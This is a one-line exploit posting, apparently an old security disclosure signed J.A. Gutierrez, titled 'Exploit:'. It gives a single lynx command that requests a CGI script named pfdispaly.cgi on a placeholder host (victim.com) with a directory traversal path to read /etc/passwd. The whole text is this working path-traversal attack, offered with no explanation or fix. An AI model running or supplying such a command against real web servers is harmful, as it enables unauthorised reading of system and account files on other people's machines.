Exploit:

  lynx -source \
  'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/passwd'

                                                J.A. Gutierrez